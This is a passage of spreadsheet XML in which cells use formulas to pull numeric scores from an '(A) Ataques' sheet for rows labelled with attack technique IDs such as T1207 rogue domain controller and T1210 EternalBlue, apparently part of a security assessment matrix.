        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF(Z50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CF50,"")</f>
        <v>7</v>
      </c>
      <c r="AF50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CH50,"")</f>
        <v>6</v>
      </c>
      <c r="AG50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CJ50,"")</f>
        <v>4</v>
      </c>
      <c r="AH50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CK50,"")</f>
        <v>2</v>
      </c>
      <c r="AI50" s="287">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($AE50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ50" s="292">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CL50,"")</f>
        <v>0</v>
      </c>
      <c r="AK50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CN50,"")</f>
        <v>0</v>
      </c>
      <c r="AL50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CP50,"")</f>
        <v>0</v>
      </c>
      <c r="AM50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CQ50,"")</f>
        <v>0</v>
      </c>
      <c r="AN50" s="331">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($AJ50=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CR50,"")</f>
        <v>1</v>
      </c>
      <c r="AP50" s="322">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CT50,"")</f>
        <v>1</v>
      </c>
      <c r="AQ50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CV50,"")</f>
        <v>1</v>
      </c>
      <c r="AR50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!$CW50,"")</f>
        <v>1</v>
      </c>
      <c r="AS50" s="287">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($AO50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT50" s="288">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!CX50,"")</f>
        <v>3</v>
      </c>
      <c r="AU50" s="392">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!CZ50,"")</f>
        <v>2</v>
      </c>
      <c r="AV50" s="4">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!DB50,"")</f>
        <v>2</v>
      </c>
      <c r="AW50" s="20">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",'(A) Ataques'!DC50,"")</f>
        <v>1</v>
      </c>
      <c r="AX50" s="331">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($AT50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY50" s="469">
        <f>'(A) Ataques'!LU50+'(A) Ataques'!MA50+'(A) Ataques'!MG50+'(A) Ataques'!MM50+'(A) Ataques'!MS50</f>
        <v>1</v>
      </c>
      <c r="AZ50" s="510">
        <f>'(A) Ataques'!LW50+'(A) Ataques'!MC50+'(A) Ataques'!MI50+'(A) Ataques'!MO50+'(A) Ataques'!MU50</f>
        <v>1</v>
      </c>
      <c r="BA50" s="471">
        <f>'(A) Ataques'!LY50+'(A) Ataques'!ME50+'(A) Ataques'!MK50+'(A) Ataques'!MQ50+'(A) Ataques'!MW50</f>
        <v>1</v>
      </c>
      <c r="BB50" s="471">
        <f>'(A) Ataques'!LQ50</f>
        <v>1</v>
      </c>
      <c r="BC50" s="331">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($AY50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD50" s="469">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!LL50,"")</f>
        <v>3</v>
      </c>
      <c r="BE50" s="510">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!LM50,"")</f>
        <v>3</v>
      </c>
      <c r="BF50" s="471">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!LN50,"")</f>
        <v>1</v>
      </c>
      <c r="BG50" s="471">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!LO50,"")</f>
        <v>2</v>
      </c>
      <c r="BH50" s="471">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!LS50,"")</f>
        <v>1</v>
      </c>
      <c r="BI50" s="331">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($BD50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ50" s="469">
        <f>'(A) Ataques'!OL50+'(A) Ataques'!OR50+'(A) Ataques'!OX50+'(A) Ataques'!PD50+'(A) Ataques'!PJ50</f>
        <v>1</v>
      </c>
      <c r="BK50" s="510">
        <f>'(A) Ataques'!ON50+'(A) Ataques'!OT50+'(A) Ataques'!OZ50+'(A) Ataques'!PF50+'(A) Ataques'!PL50</f>
        <v>1</v>
      </c>
      <c r="BL50" s="471">
        <f>'(A) Ataques'!OP50+'(A) Ataques'!OV50+'(A) Ataques'!PB50+'(A) Ataques'!PH50+'(A) Ataques'!PN50</f>
        <v>1</v>
      </c>
      <c r="BM50" s="495">
        <f>'(A) Ataques'!OH50</f>
        <v>1</v>
      </c>
      <c r="BN50" s="331">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($BJ50=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO50" s="469">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!OC50,"")</f>
        <v>1</v>
      </c>
      <c r="BP50" s="510">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!OD50,"")</f>
        <v>1</v>
      </c>
      <c r="BQ50" s="471">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!OE50,"")</f>
        <v>1</v>
      </c>
      <c r="BR50" s="471">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!OF50,"")</f>
        <v>1</v>
      </c>
      <c r="BS50" s="471">
        <f>IF('(A) Ataques'!$AP50&lt;&gt;"NO",'(A) Ataques'!OJ50,"")</f>
        <v>1</v>
      </c>
      <c r="BT50" s="331">
        <f>IF('(A) Ataques'!$AK50&lt;&gt;"NO",IF($BO50=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A51" s="79">
        <f t="shared" si="0"/>
        <v>49</v>
      </c>
      <c r="B51" s="4">
        <f>IF('(A) Ataques'!AK51&lt;&gt;"NO",'(A) Ataques'!E51,"")</f>
        <v>39</v>
      </c>
      <c r="C51" s="6" t="str">
        <f>IF('(A) Ataques'!AK51&lt;&gt;"NO",IF('(A) Ataques'!M51="","",'(A) Ataques'!M51),"")</f>
        <v>T1207-Rogue_domain_controller</v>
      </c>
      <c r="D51" s="4" t="str">
        <f>IF('(A) Ataques'!AK51&lt;&gt;"NO",'(A) Ataques'!F51,"")</f>
        <v>T1207</v>
      </c>
      <c r="E51" s="286">
        <f>IF('(A) Ataques'!AK51&lt;&gt;"NO",'(A) Ataques'!AQ51,"")</f>
        <v>88</v>
      </c>
      <c r="F51" s="288">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!BB51,"")</f>
        <v>62</v>
      </c>
      <c r="G51" s="392">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!BD51,"")</f>
        <v>58</v>
      </c>
      <c r="H51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!BF51,"")</f>
        <v>4</v>
      </c>
      <c r="I51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!BG51,"")</f>
        <v>33</v>
      </c>
      <c r="J51" s="530">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($F51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BH51,"")</f>
        <v>0</v>
      </c>
      <c r="L51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BJ51,"")</f>
        <v>0</v>
      </c>
      <c r="M51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BL51,"")</f>
        <v>0</v>
      </c>
      <c r="N51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BM51,"")</f>
        <v>0</v>
      </c>
      <c r="O51" s="532">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($K51=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P51" s="292">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BN51,"")</f>
        <v>62</v>
      </c>
      <c r="Q51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BP51,"")</f>
        <v>58</v>
      </c>
      <c r="R51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BR51,"")</f>
        <v>4</v>
      </c>
      <c r="S51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BS51,"")</f>
        <v>33</v>
      </c>
      <c r="T51" s="530">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($P51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BT51,"")</f>
        <v>94</v>
      </c>
      <c r="V51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BV51,"")</f>
        <v>80</v>
      </c>
      <c r="W51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BX51,"")</f>
        <v>6</v>
      </c>
      <c r="X51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$BY51,"")</f>
        <v>47</v>
      </c>
      <c r="Y51" s="532">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($U51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z51" s="288">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!BZ51,"")</f>
        <v>12</v>
      </c>
      <c r="AA51" s="392">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!CB51,"")</f>
        <v>10</v>
      </c>
      <c r="AB51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!CD51,"")</f>
        <v>10</v>
      </c>
      <c r="AC51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!CE51,"")</f>
        <v>3</v>
      </c>
      <c r="AD51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF(Z51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CF51,"")</f>
        <v>106</v>
      </c>
      <c r="AF51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CH51,"")</f>
        <v>90</v>
      </c>
      <c r="AG51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CJ51,"")</f>
        <v>16</v>
      </c>
      <c r="AH51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CK51,"")</f>
        <v>48</v>
      </c>
      <c r="AI51" s="287">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($AE51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ51" s="292">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CL51,"")</f>
        <v>0</v>
      </c>
      <c r="AK51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CN51,"")</f>
        <v>0</v>
      </c>
      <c r="AL51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CP51,"")</f>
        <v>0</v>
      </c>
      <c r="AM51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CQ51,"")</f>
        <v>0</v>
      </c>
      <c r="AN51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($AJ51=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CR51,"")</f>
        <v>0</v>
      </c>
      <c r="AP51" s="322">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CT51,"")</f>
        <v>0</v>
      </c>
      <c r="AQ51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CV51,"")</f>
        <v>0</v>
      </c>
      <c r="AR51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!$CW51,"")</f>
        <v>0</v>
      </c>
      <c r="AS51" s="287">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($AO51=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT51" s="288">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!CX51,"")</f>
        <v>62</v>
      </c>
      <c r="AU51" s="392">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!CZ51,"")</f>
        <v>58</v>
      </c>
      <c r="AV51" s="4">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!DB51,"")</f>
        <v>4</v>
      </c>
      <c r="AW51" s="20">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",'(A) Ataques'!DC51,"")</f>
        <v>33</v>
      </c>
      <c r="AX51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($AT51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY51" s="469">
        <f>'(A) Ataques'!LU51+'(A) Ataques'!MA51+'(A) Ataques'!MG51+'(A) Ataques'!MM51+'(A) Ataques'!MS51</f>
        <v>0</v>
      </c>
      <c r="AZ51" s="510">
        <f>'(A) Ataques'!LW51+'(A) Ataques'!MC51+'(A) Ataques'!MI51+'(A) Ataques'!MO51+'(A) Ataques'!MU51</f>
        <v>0</v>
      </c>
      <c r="BA51" s="471">
        <f>'(A) Ataques'!LY51+'(A) Ataques'!ME51+'(A) Ataques'!MK51+'(A) Ataques'!MQ51+'(A) Ataques'!MW51</f>
        <v>0</v>
      </c>
      <c r="BB51" s="471">
        <f>'(A) Ataques'!LQ51</f>
        <v>0</v>
      </c>
      <c r="BC51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($AY51=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD51" s="469">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!LL51,"")</f>
        <v>75</v>
      </c>
      <c r="BE51" s="510">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!LM51,"")</f>
        <v>75</v>
      </c>
      <c r="BF51" s="471">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!LN51,"")</f>
        <v>0</v>
      </c>
      <c r="BG51" s="471">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!LO51,"")</f>
        <v>8</v>
      </c>
      <c r="BH51" s="471">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!LS51,"")</f>
        <v>73</v>
      </c>
      <c r="BI51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($BD51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ51" s="469">
        <f>'(A) Ataques'!OL51+'(A) Ataques'!OR51+'(A) Ataques'!OX51+'(A) Ataques'!PD51+'(A) Ataques'!PJ51</f>
        <v>8</v>
      </c>
      <c r="BK51" s="510">
        <f>'(A) Ataques'!ON51+'(A) Ataques'!OT51+'(A) Ataques'!OZ51+'(A) Ataques'!PF51+'(A) Ataques'!PL51</f>
        <v>8</v>
      </c>
      <c r="BL51" s="471">
        <f>'(A) Ataques'!OP51+'(A) Ataques'!OV51+'(A) Ataques'!PB51+'(A) Ataques'!PH51+'(A) Ataques'!PN51</f>
        <v>2</v>
      </c>
      <c r="BM51" s="495">
        <f>'(A) Ataques'!OH51</f>
        <v>7</v>
      </c>
      <c r="BN51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($BJ51=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO51" s="469">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!OC51,"")</f>
        <v>8</v>
      </c>
      <c r="BP51" s="510">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!OD51,"")</f>
        <v>8</v>
      </c>
      <c r="BQ51" s="471">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!OE51,"")</f>
        <v>2</v>
      </c>
      <c r="BR51" s="471">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!OF51,"")</f>
        <v>2</v>
      </c>
      <c r="BS51" s="471">
        <f>IF('(A) Ataques'!$AP51&lt;&gt;"NO",'(A) Ataques'!OJ51,"")</f>
        <v>7</v>
      </c>
      <c r="BT51" s="331">
        <f>IF('(A) Ataques'!$AK51&lt;&gt;"NO",IF($BO51=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A52" s="79">
        <f t="shared" si="0"/>
        <v>50</v>
      </c>
      <c r="B52" s="4">
        <f>IF('(A) Ataques'!AK52&lt;&gt;"NO",'(A) Ataques'!E52,"")</f>
        <v>40</v>
      </c>
      <c r="C52" s="6" t="str">
        <f>IF('(A) Ataques'!AK52&lt;&gt;"NO",IF('(A) Ataques'!M52="","",'(A) Ataques'!M52),"")</f>
        <v>T1210-Eternal_blue</v>
      </c>
      <c r="D52" s="4" t="str">
        <f>IF('(A) Ataques'!AK52&lt;&gt;"NO",'(A) Ataques'!F52,"")</f>
        <v>T1210</v>
      </c>
      <c r="E52" s="286">
        <f>IF('(A) Ataques'!AK52&lt;&gt;"NO",'(A) Ataques'!AQ52,"")</f>
        <v>24</v>
      </c>
      <c r="F52" s="288">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!BB52,"")</f>
        <v>28</v>
      </c>
      <c r="G52" s="392">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!BD52,"")</f>
        <v>7</v>
      </c>
      <c r="H52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!BF52,"")</f>
        <v>5</v>
      </c>
      <c r="I52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!BG52,"")</f>
        <v>3</v>
      </c>
      <c r="J52" s="530">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($F52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BH52,"")</f>
        <v>10</v>
      </c>
      <c r="L52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BJ52,"")</f>
        <v>9</v>
      </c>
      <c r="M52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BL52,"")</f>
        <v>8</v>
      </c>
      <c r="N52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BM52,"")</f>
        <v>3</v>
      </c>
      <c r="O52" s="532">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($K52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P52" s="292">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BN52,"")</f>
        <v>38</v>
      </c>
      <c r="Q52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BP52,"")</f>
        <v>16</v>
      </c>
      <c r="R52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BR52,"")</f>
        <v>13</v>
      </c>
      <c r="S52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BS52,"")</f>
        <v>3</v>
      </c>
      <c r="T52" s="530">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($P52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BT52,"")</f>
        <v>52</v>
      </c>
      <c r="V52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BV52,"")</f>
        <v>17</v>
      </c>
      <c r="W52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BX52,"")</f>
        <v>12</v>
      </c>
      <c r="X52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$BY52,"")</f>
        <v>5</v>
      </c>
      <c r="Y52" s="532">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($U52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z52" s="288">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!BZ52,"")</f>
        <v>25</v>
      </c>
      <c r="AA52" s="392">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!CB52,"")</f>
        <v>22</v>
      </c>
      <c r="AB52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!CD52,"")</f>
        <v>18</v>
      </c>
      <c r="AC52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!CE52,"")</f>
        <v>6</v>
      </c>
      <c r="AD52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF(Z52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CF52,"")</f>
        <v>77</v>
      </c>
      <c r="AF52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CH52,"")</f>
        <v>39</v>
      </c>
      <c r="AG52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CJ52,"")</f>
        <v>30</v>
      </c>
      <c r="AH52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CK52,"")</f>
        <v>6</v>
      </c>
      <c r="AI52" s="287">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($AE52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ52" s="292">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CL52,"")</f>
        <v>16</v>
      </c>
      <c r="AK52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CN52,"")</f>
        <v>2</v>
      </c>
      <c r="AL52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CP52,"")</f>
        <v>2</v>
      </c>
      <c r="AM52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CQ52,"")</f>
        <v>1</v>
      </c>
      <c r="AN52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($AJ52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AO52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CR52,"")</f>
        <v>29</v>
      </c>
      <c r="AP52" s="322">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CT52,"")</f>
        <v>3</v>
      </c>
      <c r="AQ52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CV52,"")</f>
        <v>3</v>
      </c>
      <c r="AR52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!$CW52,"")</f>
        <v>1</v>
      </c>
      <c r="AS52" s="287">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($AO52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT52" s="288">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!CX52,"")</f>
        <v>51</v>
      </c>
      <c r="AU52" s="392">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!CZ52,"")</f>
        <v>17</v>
      </c>
      <c r="AV52" s="4">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!DB52,"")</f>
        <v>14</v>
      </c>
      <c r="AW52" s="20">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",'(A) Ataques'!DC52,"")</f>
        <v>3</v>
      </c>
      <c r="AX52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($AT52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY52" s="469">
        <f>'(A) Ataques'!LU52+'(A) Ataques'!MA52+'(A) Ataques'!MG52+'(A) Ataques'!MM52+'(A) Ataques'!MS52</f>
        <v>6</v>
      </c>
      <c r="AZ52" s="510">
        <f>'(A) Ataques'!LW52+'(A) Ataques'!MC52+'(A) Ataques'!MI52+'(A) Ataques'!MO52+'(A) Ataques'!MU52</f>
        <v>5</v>
      </c>
      <c r="BA52" s="471">
        <f>'(A) Ataques'!LY52+'(A) Ataques'!ME52+'(A) Ataques'!MK52+'(A) Ataques'!MQ52+'(A) Ataques'!MW52</f>
        <v>5</v>
      </c>
      <c r="BB52" s="471">
        <f>'(A) Ataques'!LQ52</f>
        <v>3</v>
      </c>
      <c r="BC52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($AY52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD52" s="469">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!LL52,"")</f>
        <v>34</v>
      </c>
      <c r="BE52" s="510">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!LM52,"")</f>
        <v>33</v>
      </c>
      <c r="BF52" s="471">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!LN52,"")</f>
        <v>5</v>
      </c>
      <c r="BG52" s="471">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!LO52,"")</f>
        <v>4</v>
      </c>
      <c r="BH52" s="471">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!LS52,"")</f>
        <v>24</v>
      </c>
      <c r="BI52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($BD52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ52" s="469">
        <f>'(A) Ataques'!OL52+'(A) Ataques'!OR52+'(A) Ataques'!OX52+'(A) Ataques'!PD52+'(A) Ataques'!PJ52</f>
        <v>5</v>
      </c>
      <c r="BK52" s="510">
        <f>'(A) Ataques'!ON52+'(A) Ataques'!OT52+'(A) Ataques'!OZ52+'(A) Ataques'!PF52+'(A) Ataques'!PL52</f>
        <v>5</v>
      </c>
      <c r="BL52" s="471">
        <f>'(A) Ataques'!OP52+'(A) Ataques'!OV52+'(A) Ataques'!PB52+'(A) Ataques'!PH52+'(A) Ataques'!PN52</f>
        <v>5</v>
      </c>
      <c r="BM52" s="495">
        <f>'(A) Ataques'!OH52</f>
        <v>3</v>
      </c>
      <c r="BN52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($BJ52=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO52" s="469">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!OC52,"")</f>
        <v>5</v>
      </c>
      <c r="BP52" s="510">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!OD52,"")</f>
        <v>5</v>
      </c>
